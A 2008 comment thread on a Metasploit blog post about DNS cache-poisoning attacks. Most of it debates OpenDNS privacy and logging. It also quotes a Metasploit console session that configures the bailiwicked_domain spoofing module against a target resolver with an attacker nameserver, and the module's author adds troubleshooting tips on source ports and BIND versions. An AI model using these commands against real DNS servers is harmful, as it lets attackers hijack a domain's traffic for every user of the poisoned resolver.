Comments on Metasploit: DNS Attacks in the Wild
(Blogger comment feed maintained by hdm; 13 comments, last updated 2009-05-05; all times -07:00)


David Ulevitch, 2008-07-30 09:31:

HD Moore,

OpenDNS does a lot more than just protect against this attack. It lets you decide what DNS you want to allow into your network, just like you'd do with an anti-spam service for your mail server.

With regards to the Google redirect, it is done to solve some issues caused by newer versions of the Google toolbar. We do it in as clear a way as possible (hence the CNAME instead of just returning an IP).

We also make it easy to turn off just by going to "Settings -> Advanced Settings" and unchecking the box for the proxy. 99.999% of people don't care, and for the few who do, that's why we make it as crystal clear as we do. And finally, we do not keep logs of ANY of the traffic that passes through it.


Anonymous, 2008-07-30 12:53:

It takes 15 minutes to install dnscache. Once you install it you never have to touch or look at it again for most installations, and it does not need patching.

http://cr.yp.to/djbdns.html


rafael, 2008-07-30 13:46:

HDM, in your ddave post you paste:

    msf > use auxiliary/spoof/dns/bailiwicked_domain
    msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
    RHOST => A.B.C.D
    msf auxiliary(bailiwicked_domain) > set DOMAIN gov
    DOMAIN => net
    msf auxiliary(bailiwicked_domain) > set SRCPORT 0
    SRCPORT => 0
    msf auxiliary(bailiwicked_domain) > set NEWDNS msfdns.ath.cx
    NEWDNS => msfdns.ath.cx

In "set DOMAIN" you set GOV and NET appears. Why?


hdm, 2008-07-30 13:52:

That was caused by a typo -- the run I did was against NET, but I managed to screw up the parameters and redid it as GOV. When I fixed the example, I forgot to fix the echoed value for the DOMAIN. The module works fine against either; I just found the GOV one more entertaining (it's also faster to pop than GOV for some reason, I think less nameservers).


Alecco (posting as Anonymous), 2008-07-31 01:06:

@David Ulevitch

You aren't clear about this behavior. I use OpenDNS and didn't know.

And you can get a warrant with gag order to make you keep logs while nobody knows. This isn't good at all.

Alecco


MaXe (www.intern0t.net), 2008-07-31 04:09:

The reason why Gov servers are slower than other nameservers, apparently, is usually improper configuration: tricky/buggy SOA records that may only be cached in a special way which does not follow the standards (in some cases). Thus a lot of the Gov domains are NOT supported without www. for some funny reason. :) (I find it quite hilarious that you can't reach all .Gov domains without www.)

Even worse is that within many SOA records on Gov and Mil domains, the responsible mail address for the nameserver is invalid, which makes it even harder to contact the responsible party to fix it.


Anonymous, 2008-07-31 13:46:

Most, if not all, of the major telco/ISPs have proven that they'll log anything, and give up anything, at government request. I can't see where OpenDNS creates any more of a real or potential privacy issue than AT&T, who have already proven they won't think twice about cooperating with the government to the detriment of their customers.


Anonymous, 2008-08-03 17:43:

AT&T's network in Austin was acting up again last night (8/2). I noticed slow loading of graphics and some failures to resolve web addresses. Running a traceroute from my home machine to www.yahoo.com showed that 4 out of 5 traces went properly to the SBC/ATT network, but around 20% were just randomly being directed (after my router) to various IP addresses in China, the Philippines, the Russian Federation, etc.

Almost 4 hours dealing with AT&T tech support, and they were not acknowledging that there could be any network problems. I switched my router to use OpenDNS servers this morning and everything has been clear sailing all day.


Anonymous, 2008-08-08 02:01:

"You aren't clear about this behavior. I use OpenDNS and didn't know."

I use OpenDNS too, and I _did_ know. It's not exactly hidden (Settings -> Advanced Settings). I think the folks at OpenDNS are very clear about their operation, as their note on this subject (http://www.opendns.com/support/article/244) would appear to confirm.

"And you can get a warrant with gag order to make you keep logs while nobody knows. This isn't good at all."

You can also disable the (limited) OpenDNS proxy, as outlined above. As for a warrant with gag order, the same could be said for everything you do while online, from your ISP to Google, and everything in between. If you're THAT concerned about your privacy, your only real solution would be to disconnect the Ethernet cable from your machine. Oh yeah... might want to watch what you check out from your local library too (http://www.ala.org/ala/washoff/woissues/civilliberties/theusapatriotact/usapatriotact.cfm)!


kus, 2008-08-08 07:24:

Hi, I installed Metasploit 3.1 on Gentoo and copied bailiwicked_host to modules... and when I run "msfconsole", bailiwicked_host doesn't exist in the list of exploits, auxiliaries, etc. What is wrong? Somebody help?


hdm, 2008-08-08 08:31:

You need the SVN version (3.2-dev):

    $ svn co http://metasploit.com/svn/framework3/trunk


kus, 2008-08-08 11:57:

Huh, thanks hdm, it works but not on my DNS server. I was waiting 1 hour and Metasploit is still continuing the process... so it may take years. Hmm, maybe I have too slow a computer? (P4 2.4, 512MB RAM)


hdm, 2008-08-08 12:07:

If it hasn't worked in about 5 minutes, something has gone wrong. Check the log files of the server, verify that the correct SRCPORT is used (or that it's actually static). We have seen reports that BIND 9.2.x and 9.3.x are not working, but have not been able to confirm.